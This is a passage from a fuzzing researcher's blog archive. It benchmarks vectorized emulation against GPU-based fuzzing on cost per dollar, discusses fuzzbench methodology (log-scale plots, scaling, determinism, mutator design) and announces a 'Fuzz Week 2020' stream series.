			buf.as_ptr(),
			buf.len() as u32,
			buf.len() as u32,
			std::ptr::null()
		);
    }
}

fn main() {
    fuzz_external();
}

This is effectively the same as above, but it no longer loops. But, since I’m using a binary-based snapshot fuzzer, and so are they, we’re going to actually snapshot it. So, instead of running this entire program every fuzz case, I’m going to put a breakpoint on the first instruction of bpf_filter_with_aux_data, and run the RISC-V JIT until it hits it. Once it hits that breakpoint, I will make a snapshot of the memory state, and at that point I will create threads which will work on executing it in a loop.

Further, I will add another breakpoint on the return site of bpf_filter_with_aux_data to immediately terminate the fuzz case upon return. This avoids having the program do cleanup (like freeing buf), and otherwise bubbling up to an exit() syscall. Their blog isn’t super clear about this, but from their wording, I suspect this is a pretty similar setup. Effectively, only bpf_filter_with_aux_data is executing, and once it is not, the VM is reset and run again.

My emulator has many different operating modes. I have different coverage levels (covering blocks, covering PCs, etc), different levels of memory protection (eg. byte-level permissions which cause every byte to have its own permissions), uninitialized memory tracking (accessing allocated memory and stacks is invalid unless it has been written to first), as well as register taint tracking (logging when user input affected register state for both register reads and writes).

Since many of these vary in performance, I’ve set up a few tests with a few common configurations. Further, I’ve provisioned a 60 core c2-standard-60 (30 Cascade Lake Intel cores, totalling 60 hyper-threads) machine from Google Cloud Project to try to apples-to-apples as best I can. This machine costs $3.1321/hour, and thus, we’ll have to divide by these costs to make it fair when we do dollar-based comparisons.

Here… we… go!

image

Okay cool, so what is this graph telling us? Well, it’s showing us the number of iterations per second per core on the Y axis, against the number of cores being used on the X axis. This is not just telling me the overall performance, but also the scaling performance of the fuzzer, or how well it uses cores.

We’re going to ignore all lines other than the top line, the one in purple (blue?). We see that the line is relatively flat until 30 cores, then it starts falling off. This is great! This lines up with ideally what we want. The emulator is scaling linearly as cores are added, until we start getting past 30 cores, where they become hyperthreads and they’re not actually physical cores. The fact that the line is flat until 30 cores makes me very happy, and a lot of painstaking engineering went into making that work!

Anyways, we have multiple lines here. The top line, to no surprise, is gathering no coverage information, isn’t tracking taint, nor is it checking permissions. Of course it’s the fastest. The next line, in green, only adds block-level code coverage. It’s almost no performance hit, and nor would I expect it to be. The JIT self-modifies once coverage has been reported, and thus the only cost is a bit of icache pollution due to some nopped out code being jumped over.

Next, we have the light blue line, which at this stage, is the first line that actually matters. This one adds checking of permissions, as well as uninitialized memory tracking. This is done at a byte-level, and thus behaves very similarly to ASAN (in fact, it allows arbitrary byte-sized holes in memory, where ASAN can only mark trailing bytes as inaccessible). This of course, has a performance cost. And this is the real line, there’s no way I’d ever run a fuzzer without permission checks as the target would simply crash the host. I could use a more relaxed permission checking model (like using the hardware MMU on Intel to provide 512-byte-level permissions (4096-byte pages / 8 VMs interleaved per page)), and I’d have the green line in performance, but it’s not worth it. Byte level is too important to me.

Finally, we have the orange line. This one adds register “taint” tracking. This effectively horizontally looks at neighboring VMs during execution to determine if one VM has written or read a different value to a register. This allows me to observe and feed back information about which register values are influenced by the user input, and thus is important information for cutting down on mutation wastes. That being said, we’re not mutating, so it doesn’t really matter, we’re just looking at the runtime costs of this instrumentation.

Where does this leave us? Well, we see that on the 60 core machine, with the light blue line (the one we care about), we end up getting about 4.1 million iterations per second per core. Since we’re running 60 cores (technically 60 threads) at this rate, we can just multiply to see that we’re getting about 250 million iterations per second on this 60 core c2-standard-60 machine.

Well, this is the number we want. What does this come out to for iterations/second/$? Simply divide 250 million by $3.1321/hour, and we get about 79.8 million iters/second/dollar/hour.

I don’t have access to their GPU code so I can’t reproduce it, but their number they claim is 8.4M iterations/second on the $0.35/hour GPU, and thus, 23.9 million iters/second/dollar/hour.

This gives vectorized emulation about a 3x advantage for performance per dollar compared to the GPU based compute. It’s important to note, both technologies have some pretty large improvements to performance which may be possible. I suspect with some optimization both could probably see 2-3x improvements, but at that point they start hitting some very real hardware limitations in performance.

Where does this leave us?

I have some suspicions that GPUs will struggle with low latency memory accesses, especially when so many VMs are diverging and doing different things. These benchmarks are best case for both these technologies, as the inputs aren’t affecting execution flow, and the memory utilization is quite low.

GPUs have some major memory limitations, that I think make them impractical for fuzzing. As mentioned in the ToB blog, a 16 GiB GPU running 40,000 threads only has 419 KiB per thread available for storage. This means the corpuses, coverage databases, and all modified memory by a fuzz case must be below 419 KiB. This unfortunately isn’t a very practical limit. Right now I’m doing some freetype2 fuzzing in light of the Google Project Zero CVE-2020-15999, and I’m pusing 50 GiB of memory use for the 1,536 VMs I run. Vecemu does memory deduplication and CoW for all memory, and thus my memory use is quite low. Ultimately, there are user-controlled allocations that occur and re-claiming the memory every fuzz case doesn’t prove very feasible. This is also a tiny target, I fuzz many targets where the input alone exceeds 1 MiB, let alone other memory used by the target.

Nevertheless, I think these problems may be solvable with creative use of transferring memory in blocks, or maybe chunking fuzz cases into sections which use less than 400 KiB at a time, or maybe just reduce the number of threads. There’s definitely solutions here, and I definitely don’t doubt that it’s possible, but I do wonder if the overheads and complexities beat what can be done directly on the CPU with massive caches and access to all memory at a relatively low cost (as opposed to GPU<->CPU memory access).

Is there more perf?

It’s important to note that my vectorized emulation is not running faster than native execution. I’m still emulating RISC-V and applying some really strict memory permission checks that slow things down, this makes my memory accesses really expensive. I am happy to see though, that vectorized emulation looks to be within about ~3x of native execution (18M packets/second in our native libpcap harness mentioned early on, 5.5M with ours). This is pretty crazy, given we’re working with binaries and applying byte-level permissions to a target which isn’t even supported by ASAN! How cool is that!?

Vectorized emulation runs close to or faster than native execution when the target has few memory loads and stores. This is by far the bottleneck (~80%+ of CPU time is spent doing my memory translations). Doing some optimization passes to reduce memory loads and stores in my IL would probably allow me to realize some of these gains.

Since I’m not running at native speeds, we know that this isn’t as fast as could be done by just building libpcap for x86 and running it. Of course this requires source, but we know that we can get about a 3x speedup by fuzzing it natively. Thus, if I have a 3x improvement on the GPU fuzzing cost effectiveness, and there’s a 3x speedup from my emulation to just “running it natively on x86”, then there’s a 9x improvement from GPU execution to just run it natively.

This kinda… proves my earlier point. The benchmark is not comparing libfuzzer to the GPU fuzzer, it’s comparing the GPU fuzzer running a target, compared to libfuzzer performing orchistration of a fuzzer and mutations. It’s just… not really comparing anything valuable. But of course, like I always complain about, public fuzzer performance is often not great. There are improvements we can get to our fuzzing harnesses, and as always, I implore people to explore the powers of in-memory, snapshot based fuzzing! Every time you do IPC, update an atomic, update/check a database, do an allocation, etc, you lose a lot of performance (when running at these speeds). For example, in vectorized emulation for this very blog, I had to batch my fuzz case increments to only happen a few times a second. Having all threads updating an atomic ~250M times a second resulted in about a 60% overall slowdown of the entire harness. When doing super tight loop fuzzing like this (as uncommon as it may be), the way we write fuzzing harnesses just doesn’t work.

But wait… what even are these dollar amounts?

So, it seems that vectorized emulation is only slightly faster than the GPU results (~3x). Vectorized emulation also has years of research into it, and the GPU research is fairly new. This 3x advantage is honestly not a big deal, it’s below the noise floor of what really matters when it comes to accessibility of hardware. If you can get GPUs or GPU developers easier than AVX-512 CPUs and developers, the 3x difference isn’t going to make a difference.

But we have to ask, why are we comparing dollar amounts? The dollar amounts are largely to determine what is most cost effective, that makes sense. But… something doesn’t seem right here.

The GPU they are using is an NVIDIA Tesla T4 and costs $0.35/hour on Google Cloud Project. The CPU they are using (for libfuzzer) is a quad core Skylake which costs $0.38/hour, or almost 10% more. What? An NVIDIA Tesla T4 is $2,152 (cheapest price I could find), and a quad core Skylake is $150. What the?

Once again, I hate the cloud. It’s a pretty big ripoff for long-running compute, but of course, it can save you IT costs and allow you to dynamically spin up.

But, for funsies, let’s check the performance per dollar for people who actually buy their hardware rather than use cloud compute.

For these benchmarks I’m going to use my own server that I host in my house and purchased for fuzzing. It’s a quad socket Xeon 6252N, which means that in total it has 96 cores and 192 threads, clocking at 2.3 GHz base, turboing to 3.6 GHz. The MSRP (and price I paid) for these processors is $1788. Thus, ~$7,152 for just the processors. Throw in about $2k for a server-grade chassis + motherboard + power supplies, and then ~$5k for 768 GiB of RAM, and you get to the $14-15k mark that I paid for this server. But, we’ll simplify it a bit, we don’t need 768 GiB of RAM for our example, so we’ll figure out what we want in GPUs.

For GPUs, the Tesla T4s are $2,152 per GPU, and have 16 GiB of RAM each. Lets just ignore all the PCI slotting, motherboards, and CPU required for a machine to host them, and we’ll just say we build the cheapest possible chassis, motherboard, PSU, and CPUs, and somehow can socket these in a $1k server. My server is about $9k just for the 4 CPUs + $2k in chassis and motherboards, and thus that leaves us with $8k budget for GPUs. Lets just say we buy 4 Tesla T4s and throw them in the $1k server, and we got them for $2k each. Okay, we have a 4 Tesla T4 machine and a 4 socket Xeon 6252N server for about $9k. We’re fudging some of the numbers to give the GPUs an advantage since a $1k chassis is cheap, so we’ll just say we threw 64 GiB into the server to match the GPUs ram and call it “even”.

Okay, so we have 2 theoretical systems. One with 96C/192T of Xeon 6252Ns and 64 GiB RAM, and one with 4 Tesla T4s with 64 GiB VRAM. They’re about $9k-$11k depending on what deals you can get, so we’ll say each one was $9k.

Well, how does it stack up?

I have the 4x 6252N system, so we’ll run vectorized emulation in “light blue” line mode (block coverage, byte-level permissions, uninitialized mem tracking, and no register taint tracking), this is a common mode for when I’m not fuzzing too deep on a target. Well, lets light up those cores.

lolcores

Sweet, we’re under 10 GiB of memory usage for the whole system, so we’re not really cheating by skimping on the memory in our theoretical 64 GiB build.

Well, we’re getting about 700 million fuzz cases per second on the whole system. Woo! That’s a shitton! That is 77k iters/second/$. Obviously this seems “lower” than what we saw before, but this is the iters/second for a one time dollar investment, not a per-hour cloud fee.

So… what do we get on the GPU? Well, they concluded with getting 8.4 million iters/sec on the cloud compute GPU. Assuming it’s close to the performance you get on bare metal (since they picked the non-preemptable GPU option), we can just multiply this number by 4 to get the iters/sec on this theoretical machine. We get 33.6 million iterations per second total, if we had 4 GPUs (assuming linear scaling and stuff, which I think is totally fair). Well… that’s 3,733 iters/second/$… or about 21x more expensive than vectorized emulation.

What gives? Well, the CPUs will definitely use more power, at 150W each you’ll be pushing 600W minimum, but I observe more in the ballpark of 1kW when running this server, when including peripherals and others. The Tesla T4 is 70W each, totalling 280W. This would likely be in a system which would be about 200W to run the CPU, chassis, RAM, etc, so lets say 500W. Well, it’d be about 1/2 the wattage of the CPU-based solution. Given power is pretty cheap (especially in the US), this difference isn’t too major, for me, I pay $0.10/kWh, thus the CPU server would cost about $0.20 per hour, and the GPU build would cost about $0.10 per hour (doubled for cooling). These are my “cloud compute” runtime costs, and thus the GPUs are still about 10x more expensive to run than the CPU solution.

Conclusion

As I’ve mentioned, this GPU based fuzzing stuff is incredibly cool. I can’t wait to see more. Unfortunately, some of the methodologies of the comparison aren’t very fair and thus I think the claims aren’t very compelling. It doesn’t mean the work isn’t thrilling, amazing, and incredibly hard, it just means it’s not really time yet to drop what we’re doing to invest in GPUs for fuzzing.

There’s a pretty large discrepency in the cost effectiveness of GPUs in the cloud, and this blog ends up getting a pretty large advantage over libfuzzer for something that is really just a pricing decision by the cloud providers. When purchasing your own gear, the GPUs are about 10x more expensive than the CPUs that were used in the blogs tests (quad-core Skylake @ $200 or so vs a NVIDIA T4 @ $2000). The cloud prices do not reflect this difference, and in the cloud, these two solutions are the same price. That being said, those are real gains. If GPUs are that much more cost effective in the cloud, then we should definitely try to use them!

Ultimately, when buying the hardware, the GPU solution is about 20x less cost effective than a CPU based solution (vectorized emulation). But even then, vectorized emulation is an emulator, and slower than native execution by a factor of 3, thus, compared to a carefully crafted, low-overhead fuzzer, the GPU solution is actually about 60x less cost effective.

But! The GPU solution (as well as vectorized emulation) allow for running closed-source binary targets in a highly efficient way, and that definitely is worth a performance loss. I’d rather be able to fuzz something at a 10x slowdown, than not being able to fuzz it at all (eg. needing source)!

Hats off to everyone at Trail of Bits who worked on this. This is incredibly cool research. I hope this blog didn’t come off as harsh, it’s mainly just me recording my thoughts as I’m always chasing the best solution for fuzzing! If that means I throw away vecemu to do GPU-based fuzzing, I will do it in a heartbeat. But, that decision is a heavy one, as I would need to invest thousands of hours in GPU development and retool my whole server room! These decisions are hard for me to make, and thus, I have to be very critical of all the evidence.

I can’t wait to see more research from you all! This is incredible. You’re giving me a real run for my money, and in only 2 months of work, fucking amazing! See you soon!


Random opinions

I’ve been asked a few things about my opinion on the GPU-based fuzzing, I’ll answer them here.

Is not having syscalls a problem?

No. It’s not. It is for people who want to use the tool. But this is a research tool and is for exploring what is possible, the act of fuzzing on a GPU by running binary translated code is incredible, that’s the focus here! GPUs are turing complete, we can definitely emulate syscalls on them if needed. It might be a lot of work, a lot of plumbing, maybe a perf hit, but it doesn’t stop it from being possible. Most of my fuzzers rely on emulating syscalls.

There’s also nothing preventing GPUs from being used to emulate an whole OS. You’d have to handle self-modifying code and virtual memory, which can get very expensive in an emulator, but with making software TLBs these things can be manageable to a level it’s still worth doing!


Social

I’ve been streaming a lot more regularly on my Twitch! I’ve developed hypervisors for fuzzing, mutators, emulators, and just done a lot of fun fuzzing work on stream. Come on by!

Follow me at @gamozolabs on Twitter if you want notifications when new blogs come up. I often will post data and graphs from data as it comes in and I learn!

Some thoughts on fuzzing

11 August 2020 at 07:11

Foreward

This blog is a bit weird, this is actually a message I posted in response to a fuzzbench issue, but honestly, I think it warranted a blog, even if it’s a bit unpolished!

You can find the discussion at fuzzbench issue tracker #654

Social

I’ve been streaming a lot more regularly on my Twitch! I’ve developed hypervisors for fuzzing, mutators, emulators, and just done a lot of fun fuzzing work on stream. Come on by!

Follow me at @gamozolabs on Twitter if you want notifications when new blogs come up. I often will post data and graphs from data as it comes in and I learn!

The blog

Hello again Today!

So, I’d like to address a few things that I’ve thought of a bit more over time and want to emphasize.

Visualizations, and what I’m often looking for in data

When it comes to visualizations, I don’t really mind much which graphs are displayed by default, linear vs logscale, time-based or per-case-based, but they should both be toggleable in the default. I’m not web dev, but having an interactive graph would be pretty nice, allowing for turning on and off of certain lines, zooming in and out, and changing scales/axes. But, I think we’re in agreement here. I personally believe that logscale should be default, and I don’t see how it’s anything but better, unless you only care about seeing where things “flatten out”. But in that case, it’s just as visible in logscale, you just have to be logscale aware.

Here’s an example of typically what I graph when I’m running and tuning a fuzzer. I’m using doing side-by-side comparisons of small fuzzer tweaks, to my prior best runs, and plotting both on a time domain and a fuzz case domain. I’ve included the linear-scale plots just for comparison with the way we currently do things, but I personally never use linear scale as I just find it to be worse in all aspects.

image

By using a linear scale, we’re unable to see anything about what happens in the fuzzer in the first ~20 min or so. We just see a vertical line. In the log scale we see a lot more which is happening. This graph is comparing a fuzzer which does rand() % 20 rounds of mutation (medium corruption), versus rand % 5 rounds of the same corruption (low corruption). We can see that early on medium corruption has much better properties, as it explores more aggressively. But there’s actually a point where they cross, and this is likely the point where the corruption becomes too great on average in the medium corruption, and ends up “ruining” previously good inputs, dramatically reducing the frequency we see good cases. It’s important to note, that since the medium corruption is a superset of low corruption (eg, there’s a chance to do low corruption), both graphs would eventually converge to the exact same value.

There’s just so much information in this graph that stands out to me. I see that something about medium corruption performs well in the first ~100 seconds. There’s a really good lead at the early few seconds, and it tapers off throughout. This gives me feedback on maybe when and where I should use this level of corruption.

Further, since I have both a fuzz case graph and a time graph, I can see that medium corruption early on actually has better performance than low corruption. Once again, this makes sense, the more corruption, the more likely you are to make a more invalid input which is parsed more shallow. But from the coverage over case, I see that this isn’t a long term thing and eventually the performance seems to converge between the two. It’s important to note, the intersection point of the two lines varies by quite a bit in both the case domain and the time domain. This tells me that even though I just changed the mutator, it has affected the performance, likely due to the depth of the average input in the corpus, really neat!

Example analysis conclusion

I see that medium corruption in this case is giving me about 10x speedup in time-to-same-coverage, and also some performance benefits early on. I should adopt a dynamic corruption model which tunes this corruption amount maybe against time, or ideally, some other metric I could extract from the target or stats. I see that long-term, the low corruption starts to win, and for something that I’d run for a week, I’d much rather run the low corruption.

Even though this program is very simple, these graphs could pretty arbitrary be stretched out to different time axis. If fuzzbench picks a deadline, for example, 1000 seconds, we would never know this about the fuzzer performance. I think this is likely what many fuzzers are now being tuned to, as the benchmarks often are 12/24/72 hour increments. Fuzzers often get some extra blips even deeper in the runs, and it’s really hard to estimate if these crosses would ever occur.

The case for cases

I personally extract most information from graphs which are plotted against number of fuzz cases rather than time. By doing benchmarks in a time domain, you factor in the performance of the fuzzer. This is this ground truth, and what really matters at the end of the day with complete products. But it’s not the ground truth for fuzzers in development. For example, if I wanted to prototype a new mutation strategy for AFL, I would be forced to do it in C, avoid inefficient copies, avoid mallocs, etc. I effectively have to make sure my mutator is at-or-better than existing AFL mutator performance to use benchmarks like this.

When you do development on fuzz cases, you can start to inspect the efficiency of the fuzzer in terms of quality of cases produced. I could prototype a mutator in python for all I care, and see if it performs better than the stock AFL mutators. This allows me to cut corners and spend 1 day trying out a mutator, rather than 1 month making a mutator and then doing complex optimizations to make it work. During early stages of development, I would expect a developer to understand the ramifications of making it faster, and to have a ballpark idea of where it could be if the O(n^3) logic was turned into O(log n), and whether it’s possible.

Often times, the first pass of an attempt is going to be crude, and for no reason other than laziness (and not in a negative way)! There’s a time and a place to polish and optimize a technique, and it’s important that there can be information learned from very preliminary results. Most performance in standard feedback mechanisms and mutation strategies can be solved with a little bit of engineering, and most developers should be able to gauge the best-case big-O for their strategy, even if that’s not the algorithmic complexity of their initial implementation.

Yep, looking at coverage over cases adds nuance, but I think we can handle it. Given most fuzzing tools, especially initial passes, are already so un-optimized, I’m really not worried about any performance differences in AFL/libfuzzer/etc when it comes to single-core performance.

Scaling

Scaling of performance is really missing from fuzzbench. At every company I’ve worked at, big and small, even for the most simple targets we’re fuzzing we’re running at least ~50-100 cores. I presume (I don’t know for sure) that fuzzbench is comparing single core performance. That’s great, it’s a useful stat and one I often control for, as single-core, coverage/case is often controlled for both scaling and performance, leading to great introspection into the raw logic of the fuzzer.

However, in reality, the scaling of these tools is critical for actual use. If AFL is 20% faster single-core, that’ll likely make it show up at the top of fuzzbench, given relative parity of mutation strategies. That’s great, the performance takes engineering effort and should not be undervalued. In fact, most of my research is focused around making fuzzers fast, I’ve got multiple fuzzers that can handle 10s of billions of fuzz cases per second on a single machine. It’s a lot of work to make these tools scale, much more so than single-core performance, which is often algorithmic fixes.

If AFL is 20% faster single-core, but bottlenecks on fork(), or write(), and thus only scales to 20-30 cores (often where I see AFL really fall apart, on medium size targets, 5-10 cores for small targets). But something like libfuzzer manages things in memory and can scale linearly with as many cores as you throw it, libfuzzer is going to blow away any 20% performance gains seen single-core.

This information is very hard to benchmark. Well, not hard, but costly. Effectively, I’d like to see benchmarks of fuzzers scaled to ~16 cores on a single server, and ~128 cores distributed across at least 4 servers. This benchmarks. A. the possibility the fuzzer can scale in the first place, if it can’t that’s a big hit to real-world usability. B. the possibility it can scale across servers (often, over the network). Things like AFL-over-SMB would have brutal scaling properties here. C. the scalability properties between cores on the same server, and how they transfer over the network.

I find it very unlikely that these fuzzers being benchmarked even remotely have similar scaling properties. AFL struggles to scale even on a single server, even in persistent mode, due to the heavy use of syscalls and blocking IPC every fuzz case (signal(), read(), write(), per case IIRC, ~3-4 syscalls).

Scaling also puts a lot of pressure on infeasible fuzzing strategies proposed in papers. We’ve all seen them, the high-introspection techniques which extract memory, register, taint state from a small program and promise great results. I don’t disagree with the results, the more information you extract, pretty much directly correlates to an increase in coverage/case. But, eventually the data load gets very hard to share between cores, queue between servers, and even just process.

Measuring symbolic

Measuring symbolic was brought up a few times, as it would definitely have a much better coverage/case than a traditional fuzzer. But this nuance can easily be handled by looking at both coverage/case and coverage/time graphs. Learning what works well algorithmicly should drive our engineering efforts to solve problems. While symbolic may have huge performance issues, it’s very likely, that many of the parts of it (eg. taint tracking) can be approximated with lossy algorithms and data capturing, and it’s more about learning where it has strengths and weaknesses. Many of the analyses I’ve done on symbolic largely lead me to vectorized emulation, which allows for highly-compressed, approximated taint tracking, while still getting near-native (or even better) execution speeds.

The case against monolithic fuzzers

Learning what works is important to figure out where to invest our engineering time. Given the quality of code in fuzzing right now (often very poor), there’s a lot of things that I’d hate to see us rule out because our current methodologies do not support them. I really care about my reset times of fuzz cases, (often: the fork() costs), as well as determinism. In a fully deterministic environment, with fast resets, a lot of approximate strategies can be used. Trying to approximate where bytes came from in an input, flipping the bytes because you have a branch target which is interesting, and then smashing those bytes in can give good information about the relation of those bytes to the input. Hell, with fast resets and forking, you can do partial fuzzing where you fork() and snapshot multiple times during a fuzz case, and you can progressively fuzz “from” different points in the parser. This works especially well for protocols where you can snapshot at each packet boundary.

These sorts of techniques and analyses don’t really work when we have monolithic fuzzers. The performance of existing fuzzers is often quite poor (AFL fork(), etc), or does not support partial execution (persistent modes, libfuzzer, etc). This leads to us not being able to even research these techniques. As we keep bolting things onto existing fuzzers and treating them like big blobs, we’ll get further and further from being able to learn the isolated properties of fuzzers and find the best places to apply certain strategies.

Why I don’t care much about fuzzer performance for benchmarking

Reset speed

AFL fork() bottlenecks for me often around 10-20k execs/sec on a single core, and about 40-50k on the whole system, even with 96C/192T systems. This is largely due to just getting stuck on kernel allocations and locks. Spinning up processes is expensive, and largely out of our control. AFL allows access of the local system and kernel to the fuzz case, thus cases are not deterministic, nor are they isolated (in the case of fuzzing something with lock files). This requires using another abstraction layer like docker, which adds more overhead to the equation. My hypervisors that I use for fuzzing can reset a Windows VM 1 million times per second on a single core, and scale linearly with cores, while being deterministic. Why does this matter? Well, we’re comparing tooling which isn’t even remotely hitting the capabilities of the CPUs, rather they’re bottlenecking on the kernel. These are solvable problems, and thus, as a consumer of good ideas but not tooling, I’m interested in what works well. I can make it go fast myself.

Determinism

Most fuzzers that we work with now are not deterministic. You cannot expect instruction-for-instruction determinism between cases. This makes it a lot harder to use complex fuzzing strategies which may rely on the results of a prior execution being identical to a future one. This is largely an engineering problem, and can be solved in both system-level and app-level targets.

Mutation performance

The performance of mutators is often not what it can be. For example, honggfuzz used (now fixed, cheers!) temporary allocations during multiple passes. During its mangle_MemSwap it made a copy of the chunk that was to be swapped, performing 3 memcpys and using a temporary allocation. This logic was able to be implemented using a single memcpy and without a dynamic allocation. This is not a criticism of honggfuzz, but more of an important note of how development often occurs. Early prototyping, success, and rare revisiting of what can be changed. What’s my point here? Well, the mutation strategies in many fuzzers may introduce timing properties that are not fundamentally required to have identical behaviors. There’s nothing wrong with this, but it is additional noise which factors into time-based benchmarks. This means a good strategy can be hurt by a bad implementation, or, just a naive one that was done early on. This is noise that I think is big to remove from analysis such that we can try to learn what ideas work, and engineer them later.

Further, I don’t know of any mutational fuzzer which doesn’t mutate in-place. This means the multiple splices and removals from an input must end up memcpy()ing the remainder. This is a very common mutation pass. This means the fuzzer exponentially slows down WRT the input file size. Something we see almost every fuzzer put insane restrictions on (AFL has a fit if you give it anything but a tiny file).

There’s nothing stopping us from making a tree-based fuzzer where a splice adds a node to the tree and updates metadata on other nodes. The input could be serialized once when it’s ready to be consumed, or even better, serialized on-demand, only providing the parts of the file which actually were used during the fuzz case.

Example:

Initial input: "foobar", tree is [pointer to "foobar", length 6]
Splice "baz" at 3: [pointer to "foo", length 3][pointer to "baz", length 3][pointer to "bar", length 3]
Program read()s 3 bytes, return "foo" without serializing the rest
Program crashes, tree can be saved or even just what has read can be saved

In this, the cost is N updates to some basic metadata, where N is the number of mutations performed on that input (often 5-10). On a new fuzz case, you start with an initial input in one node of the tree, and you can once again split it up as needed. Pretty much no memcpys() need to be performed, nor allocations, as the input can be extended such that in-memory it’s “foobarbaz”, but the metadata describes that the “baz” should come between “foo”, and “bar”.

Restructuring the way we do mutations like this allows us to probably easily find 10x improvements in mutator performance (read, not overall fuzzer performance). Meaning, I don’t really want the cost of the mutator to be part of the equation, because once again, it’s likely a result of laziness or simplicity. If something really brings a strategy to the table that is excellent, we can likely make it work just as fast (but likely even faster), than existing strategies.

Not to note the value in potentially knowing which mutations were used during prior cases, and you could potentially mutate this tree (eg, change a splice from 5 bytes to 8 bytes, without changing the offset, just changing the node in the mutation tree). This could also be used as a mechanism to dynamically weight mutation strategies based on yields, while still getting a performance gain over the naive implementation.

Performance conclusion

From previous work with fuzzers, most of the reset, overhead, and corruption logic is likely not even within an order of magnitude of the possible performance. Thus, I’m far more interested in figuring out what and where strategies work, as the implementations of them are typically not indicative of their performance.

BUT! I recognize the value in treating them as whole systems. I’m a bit more on the hard-core engineering side of the problem. I’m interested in which strategies work, not which tools. There’s definitely value in knowing which tools will work best, given you don’t have the time to tweak or rebuild them yourself. That being said, I think scaling is much more important here, as I don’t know of really anyone doing single-core fuzzing. The results of these fuzzers at scale is likely dramatically different from single-core, and would put some major pressure on some more theoretical ideas which produce way too much information to consume and handle.

Reconstructing the full picture from data

The data I would like to see fuzzbench give, and I’d give you some massive props for doing it, would be the raw, microsecond-timestamped information for each coverage gained.

This means, every time coverage increases, a new CSV record (or whatever format) is generated, including the time stamp when it was found (to the microsecond), as well as the fuzz iteration ID which indicates how many inputs have been run into the fuzzer. This should also include a unique identifier of the block which was found.

This means, in post, the entire progress of the fuzzer can be reconstructed. Every edge, which edges they were, the times they were found, and the case ID they were on when they were found allows comparing not only the raw “edge count” but also the differences between edges found. It’s crazy that this information is not part of the benchmark, as almost all the fuzzers could be finding nearly the same coverage, but a fuzzer which finds less coverage, but completely unique edges, would be devalued.

This is the firehose of data, but since it’s not collected on an interval, it very quickly turns into almost no data.

Hard problem: What is coverage?

This leads to a really hard problem. How do we compare coverage between tools? Can we safely create a unique block identifier which is universal between all the fuzzers and their targets. I have no idea how fuzzbench solves this (or even if it does). If fuzzbench is relying on the fuzzers to have roughly the same idea of what an edge is, I’d say the results are completely invalid. Having different passes which add different coverage gathering, compare information gathering, could easily affect the graphs. Even just non-determinism in clang (or whatever compiler) would make me uneasy about if afl-clang binaries have identical graph shapes to libfuzzer-clang binaries.

If fuzzbench does solve this problem, I’m curious as to how. I’d anticipate it would be through a coverage pass which is standardized between all targets. If this is the case, are they using the same binaries? If they’re not, are the binaries deterministic, or can the fuzzers affect the benchmark coverage information due to adding their own compiler instrumentation.

Further, if this is the case, it makes it much harder to compare emulators or other tools which gather their own coverage in a unique way. For example, if my emulators, which get coverage for effectively free, had to run an instrumented binary for fuzzbench to get data, it’s not a realistic comparison. My fuzzer would be penalized twice for coverage gathering, even though it doesn’t need the instrumented binary.

Maybe someone solved this problem, and I’m curious what the solution is. TL;DR: Are we actually comparing the same binaries with identical graphs, and is this fair to fuzzers which do not need compile-time instrumentation.

The end

Can’t wait for more discussion. You have been very receptive even when I’m often a bit strongly opinion-ed. I respect that a lot.

Stay cute,

gamozo

Fuzz Week 2020

12 July 2020 at 07:11

Summary

Welcome to fuzz week 2020! This week (July 13th - July 17th) I’ll be streaming every day going through some of the very basics of fuzzing all the way to cutting edge research. I want to use this time to talk about some things related to fuzzing, particularly when it comes to benchmarking and comparing fuzzers with each other.

Schedule

Ha. There’s really no schedule, there is no script, there is no plan, but here’s a rough outline of what I want to cover.

I will be streaming on my Twitch channel at approximately 14:00 PST. But things aren’t really going to be on a strict schedule.

My Twitter is probably the best source of information for when things are about to start.

Everything will be recorded and uploaded to my YouTube.

July 13th

The very basics of fuzzing. We’ll write our own fuzzer and tweak it to improve it. We’ll probably start by writing it in Python, and eventually talk about the performance ramifications and the basics of scaling fuzzers by using threads or multiple processes. We’ll also compare our newly written fuzzer against AFL and see where AFL outperforms it, and also where AFL has some blind spots.

July 14th

Here we’ll cover code coverage. We might get to this sooner, who knows. But we’re going to write our own tooling to gather code coverage information such that we can see not only how easy it is to set up, but how flexible coverage information can be while still proving quite useful!

July 15th-17th

Here we’ll focus mainly on the advanced aspects of fuzzing. While this sounds complex, fuzzing really hasn’t become that complex yet, so follow along! We’ll go through some of the more deep performance properties of fuzzing, mainly focused around snapshot fuzzing.

Once we’ve discussed some basics of performance and snapshot fuzzing, we’ll start talking about the meaningfulness of comparing fuzzers. Namely, the difficulties in comparing fuzzers when they may involve different concepts of what a crash, coverage, or input are. We’ll look at some existing examples of papers which compare fuzzers, and see how well they actually prove their point.

Biases

I think it’s important when doing something like this, to make it clear what my existing biases are. I’ve got a few.

  • I think existing fuzzers have some major performance problems and struggle to scale. I consider this to be a high priority as general performance improvements to fuzzing harnesses makes both generic fuzzers (eg. AFL, context-unaware fuzzers) and hand-crafted (targeted) fuzzers better.
  • I don’t think outperforming AFL is impressive. AFL is impressive because it’s got an easy-to-use workflow, which makes it accessible to many different users, broadening the amount of targets it has been used against.
  • I don’t really thinking comparing fuzzers is reasonable.
  • I think it is very easy to over-fit a fuzzer to small programs, or add unrealistic amounts of information extraction from a target under test, in a way that the concepts are not generally applicable to many targets that exceed basic parsers. I think this is where a lot of current research falls.

But… that’s mainly the point of this week. To either find out my biases are wildly incorrect, or to maybe demonstrate why I have some of the biases. So, how will I address some of these (in order of prior bullets)?

  • I’ll compare some of my fuzzers against AFL. We’ll see if we can outperform AFL in terms of raw fuzz cases performed, as well as the results (coverage and crashes).
  • I’ll try to demonstrate that a basic fuzzer with 1/100th the amount of code of AFL is capable of getting much better results, and that it’s really not that hard to write.
  • I’ll propose some techniques that can be used to compare fuzzers, and go through my own personal process of evaluating fuzzers. I’m not trying to get papers, or funding, or anything. I don’t really have an interest in making things look comparatively better. If they perform differently, but have different use cases, I’d rather understand those cases and apply them specifically rather than have a one-shoe-fits-all solution.
  • I’ll go through some instrumentation that I’ve historically added to my fuzzers which give them massive result and coverage boosts, but consume so much information that they cannot meaningfully scale past tiny pieces of code. I’ll go through when these things may actually be useful, as sometimes isolating components is viable. I’ll also go through some existing papers and see what sorts of results are being claimed, and if they actually have general applicability.

Winging it

It’s important to note, nothing here is scheduled. Things may go much faster, slower, or just never happen. That’s the beauty of research. I may be very wrong with some of my biases, and we’ll hopefully correct those. I love being wrong.

I’ve maybe thought of having some fuzzing figureheads pop on the stream for random discussions/conversations/interviews. If this is something that sounds interesting to you, reach out and we can maybe organize it!

Sound fun?

See you there :)


CPU Introspection: Intel Load Port Snooping

30 December 2019 at 04:11

Load sequence example

